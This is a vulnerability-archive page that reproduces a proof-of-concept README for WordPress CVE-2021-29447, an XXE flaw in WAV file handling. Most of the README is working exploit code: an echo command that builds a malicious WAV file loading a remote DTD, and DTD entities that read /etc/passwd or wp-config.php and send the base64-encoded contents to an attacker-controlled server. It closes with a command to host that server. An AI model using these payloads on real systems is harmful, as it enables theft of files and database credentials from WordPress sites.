关联漏洞
标题:
WordPress 代码问题漏洞
(CVE-2021-29447)
描述:WordPress是WordPress(Wordpress)基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 存在代码问题漏洞,攻击者可利用该漏洞在成功的XXE攻击中可以访问内部文件。
介绍
# CVE-2021-29447
## Impact
Arbitrary File Disclosure: the content of any file on the host’s file system could be retrieved, e.g. wp-config.php which contains sensitive data such as database credentials.
Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.
Exploiting the vulnerability
A wordpress site affected by this vulnerability has been identified in the enumeration process with the help of the wpscan tool.
## Creating a malicious WAV file.
It's very easy, in your bash console
nano poc.wav
```echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav```
In your attacker pc create a dtd with the code execute in the web server.
```
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
```
Note: for read wordpress files use the syntax "../WP-FILE.php"
```
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
```
Host a python server to the files directory (python3 -m http.server 8081)
## Ref:
https://github.com/motikan2010/CVE-2021-29447
https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5
文件快照
[4.0K] /data/pocs/b95e3dbefe3a99dc6c79ec9a349eab600a3326c4
└── [1.6K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。